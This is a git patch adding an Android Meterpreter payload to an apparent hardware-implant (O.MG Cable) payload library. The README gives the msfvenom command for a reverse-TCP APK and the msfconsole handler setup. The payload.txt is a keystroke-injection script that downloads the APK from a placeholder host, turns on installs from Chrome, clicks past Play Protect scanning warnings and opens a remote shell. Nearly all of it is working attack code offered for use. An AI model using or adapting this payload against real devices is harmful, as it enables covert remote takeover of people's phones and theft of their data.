From 224587b4a546176b192fc4d5c473abf843165edc Mon Sep 17 00:00:00 2001 From: int0x80 Date: Thu, 13 Jan 2022 21:09:38 -0600 Subject: [PATCH] Android Meterpreter --- .../mobile/android/meterpreter/README.md | 39 ++++++ .../mobile/android/meterpreter/payload.txt | 130 ++++++++++++++++++ 2 files changed, 169 insertions(+) create mode 100644 payloads/library/mobile/android/meterpreter/README.md create mode 100644 payloads/library/mobile/android/meterpreter/payload.txt diff --git a/payloads/library/mobile/android/meterpreter/README.md b/payloads/library/mobile/android/meterpreter/README.md new file mode 100644 index 0000000..b6fb9e7 --- /dev/null +++ b/payloads/library/mobile/android/meterpreter/README.md @@ -0,0 +1,39 @@ +# Android Meterpreter + +An OMG Cable payload which downloads and installs an APK onto an Android device. Here are the high-level notes. + +I would like to see operating systems prompt for authentication when performing risky behaviors, such as installing a new app. + +## Generate Payload + +Regular `msfvenom` payload generation. + +```D +$ msfvenom -p android/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=5555 -o /data/omg.apk +[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload +[-] No arch selected, selecting arch: dalvik from the payload +No encoder specified, outputting raw payload +Payload size: 79592 bytes +Saved as: /data/omg.apk +``` + +## Handler + +These instructions can also be saved and loaded as an `rc` file via `msfconsole -r`. + +``` +$ msfconsole +msf6 > use exploit/multi/handler +msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp +msf6 exploit(multi/handler) > set lport 5555 +msf6 exploit(multi/handler) > set lhost eth0 +msf6 exploit(multi/handler) > run +``` + +## Miscellaneous + +Some apparent artifacts remain. This is an abbreviated list. + +* Notification shows apk was downloaded +* APK remains installed as MainActivity + * `app_uninstall com.metasploit.stage` does not remove the apk diff --git a/payloads/library/mobile/android/meterpreter/payload.txt b/payloads/library/mobile/android/meterpreter/payload.txt new file mode 100644 index 0000000..bd2ae29 --- /dev/null +++ b/payloads/library/mobile/android/meterpreter/payload.txt @@ -0,0 +1,130 @@ +REM # ----------------------------------------------------------- +REM # Title: OMG Android Meterpreter +REM # Description: Download and install an APK on Android +REM # Author: int0x80 +REM # Target: Android 11 +REM # Notes: Set URL for APK payload below +REM # ----------------------------------------------------------- + + +REM # ----------------------------------------------------------- +REM # Launch browser to APK destination +REM # ----------------------------------------------------------- + +GUI b +DELAY 1000 +CTRL l +DELAY 50 +STRING https://x.x.x.x/your-app.apk +DELAY 50 +ENTER +DELAY 2000 + + +REM # ----------------------------------------------------------- +REM # Move focus to 'Open' link +REM # ----------------------------------------------------------- + +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +RIGHT +DELAY 50 +ENTER +DELAY 500 + + +REM # ----------------------------------------------------------- +REM # Select Chrome as approved source to install apps +REM # ----------------------------------------------------------- + +ENTER +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 50 + + +REM # ----------------------------------------------------------- +REM # Finish approved source +REM # GUI DELETE might work here +REM # ----------------------------------------------------------- + +GUI TAB +DELAY 50 +ENTER +DELAY 50 + + +REM # ----------------------------------------------------------- +REM # Scanning and Play Store warnings +REM # Install, Install Anyway, Don't send for scanning, Open +REM # ----------------------------------------------------------- + +RIGHT +DELAY 50 +ENTER +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 50 +ENTER +DELAY 250 + + +REM # ----------------------------------------------------------- +REM # Accept access settings and Continue +REM # ----------------------------------------------------------- + +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +TAB +DELAY 50 +ENTER +DELAY 250 + + +REM # ----------------------------------------------------------- +REM # Get shell and obligatory calc +REM # ----------------------------------------------------------- + +ENTER +DELAY 250 +GUI a